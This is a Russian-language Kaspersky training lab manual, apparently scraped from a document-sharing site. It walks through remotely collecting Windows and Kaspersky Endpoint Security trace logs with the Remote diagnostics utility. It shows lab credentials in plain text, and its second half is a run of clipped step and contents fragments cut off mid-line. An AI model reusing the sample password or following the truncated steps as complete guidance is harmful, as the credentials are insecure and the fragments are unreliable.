33. Перейдите по ссылке Deliver reports
194
Собрать диагностическую информацию

Schedule
35. Установите интервал
рассылки Weekly
36. Выберите день Monday и
время 10:00 и нажмите Save
Вы удалили отчеты, которые не используете, и теперь сможете быстрее находить нужные отчеты.

Сценарий. На одном из компьютеров не запускаются компоненты Kaspersky Endpoint Security, и вы не
смогли разобраться, в чем проблема, и решить ее. Соберите журналы трассировки Kaspersky Endpoint
Security, чтобы обратиться в техническую поддержку. Сделайте это удаленно из Консоли
администрирования.
Содержание. В этой лабораторной работе удаленно соберите с компьютера журналы событий Windows и
трассировки продукта.
Найдите компьютер Alex-Desktop в консоли и запустите через контекстное меню утилиту удаленной
диагностики. В окне утилиты включите запись трассировки для Kaspersky Endpoint Security, перезагрузите
Kaspersky Endpoint Security и загрузите полученные логи. Дополнительно загрузите информацию о
компьютере и журналы Windows: Kaspersky Event Log и System.
195
1. Войдите в систему под учетной

записью abc\Admin с паролем
Ka5per$Ky
2. Запустите MMC-консоль
администрирования
3. Нажмите правой кнопкой мыши на
узел сервера администрирования и
выберите Connect to Administration
Server в контекстном меню
4. Введите в поле адреса сервера

администрирования ksc
5. Используйте учетные данные:
Пользователь: Administrator
Пароль: Ka5per$Ky
6. Включите опцию Remember credentials
8. Скачайте сертификат сервера

администрирования – нажмите OK
196
9. Введите код аутентификации из Google

Authenticator
10. Подтвердите, что вы прочитали руководство по усилению защиты и нажмите Accept
197
11. Перейдите в узел Managed Devices

12. Найдите компьютер Alex-Desktop:
запустите утилиту поиска из контекстного
меню узла Managed Devices
13. Введите имя компьютера Alex-Desktop и нажмите Find Now
198
14. Убедитесь, что компьютер Alex-Desktop появился в результатах поиска

15. Запустите утилиту удаленной диагностики: вызовите контекстное меню компьютера и выберите
Custom tools | Remote diagnostics
16. В поле Administration Server укажите ksc

17. Проверьте, что в поле Device написано
имя компьютера Alex-Desktop
18. Подключите утилиту к компьютеру:
нажмите Sign in
199
19. Включите трассировку:

выберите в списке Kaspersky
Endpoint Security for Windows
20. Нажмите ссылку Enable tracing
21. Оставьте Tracing Level 500

22. Выберите параметр Rotation-
based tracing
23. Установите параметр Files
count равный 2
24. Выберите Maximum file size -
20 МБ
200
26. Перезагрузите Kaspersky

Endpoint Security: нажмите
ссылку Restart application
27. Подождите, пока Kaspersky
Endpoint Security
перезагрузится и внизу окна
появится сообщение Operation
completed successfully
28. Выключите трассировку:
нажмите ссылку Disable tracing
201
29. Разверните папку Trace files в узле Kaspersky Endpoint Security for Windows
30. Выберите первый в списке файл и нажмите ссылку Download entire file
31. Точно так же загрузите остальные файлы из папки Trace files
202
32. Загрузите информацию о

компьютере: перейдите в узел
System Info
33. Нажмите ссылку Download
System Info
34. Подобным образом сохраните
журналы Kaspersky Event Log
и System из папки System
event Log
35. Нажмите ссылку Download
folder в левом нижнем углу
36. Проверьте, что в папке находятся все необходимые журналы
203
37. Закройте утилиту диагностики

38. Не удаляйте папку с журналами: нажмите No
Вы загрузили с компьютера журналы событий Windows и трассировки Kaspersky Endpoint Security.

Приложите эти данные к инциденту, когда будете создавать запрос в техническую поддержку.
Используйте утилиту диагностики, если нужно получить журналы Агента администрирования или модуля
обновления, чтобы загрузить журналы установки, а также чтобы включать и выключать трассировку
Сервера администрирования.
204

KL 002.12 Ru Labs v1.8

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

KL 002.12 Ru Labs v1.8

Загружено:

Авторское право:

Доступные форматы

KL 002.12: Kaspersky Endpoint Security and Management.

Задание B: Отключите часть компонентов защиты ............................................................73

Лабораторная работа 19. Расследовать инцидент ..............................................................................142

Содержание. В этой лабораторной работе:

1. Установите Сервер администрирования и Веб-консоль Kaspersky Security Center

Задание A: Установите Сервер администрирования и Веб-консоль Kaspersky

Компьютеры KSC, DC должны быть включены.

Задание выполняется на компьютере KSC.

1. Войдите в систему от имени

Мы используем учетную запись

3. Нажмите Install Kaspersky

4. В окне приветствия нажмите

9. Выберите тип установки

10. Выберите тип установки

11. Оставьте размер сети Fewer

12. Выберите PostgreSQL or

13. Нажмите Next

14. Введите дважды пароль для

16. Начните установку: нажмите

17. После установки KSC

18. В окне приветствия нажмите

19. Примите условия

20. Оставьте папку назначения

22. Укажите Адрес

25. Убедитесь, что порт 8080

28. Оставьте настройки без

30. Выберите параметр

32. Убедитесь, что в списке

34. Пропустите этот шаг и

35. Начните установку: нажмите

36. Закройте мастер установки

37. Выключите автоматический

Задание B: Пройдите мастер первоначальной настройки Сервера

Задание выполняется на компьютере Admin-Laptop.

39. Войдите в систему от

43. Введите имя пользователя Administrator

При первом подключении, веб-консоль

45. Внимательно прочитайте руководство по

Также, при первом

46. В окне приветствия

47. Использование Proxy

48. Нажмите Next

51. Выберите Lite

55. Дождитесь окончания

56. Выберите пакет

60. Выберите Enter

62. Нажмите Send

65. Нажмите Next

66. Нажмите Create и

73. Нажмите Next

74. Снимите флажок Run

76. В боковом меню выберите Devices | Polices & Profiles

78. Перейдите на вкладку Application Settings в раздел Connectivity

80. Измените параметр Synchronization interval (min) на 3

Интервал синхронизации меняется только для удобства выполнения лабораторных работ. В

Задание C: Настройте двухфакторную аутентификацию для входа в веб-консоль

Google Authenticator предварительно установите на любое мобильное устройство, которое может

Задание выполняется на компьютере Admin-Laptop.

83. Установите приложение Google Authenticator на Ваше мобильное устройство

84. Перейдите в раздел Users & roles | Users

Будьте аккуратны – имя пользователя чувствительно к регистру

86. В списке пользователей отобразится учетная запись KSC\Administrator. Нажмите на нее

87. Перейдите на вкладку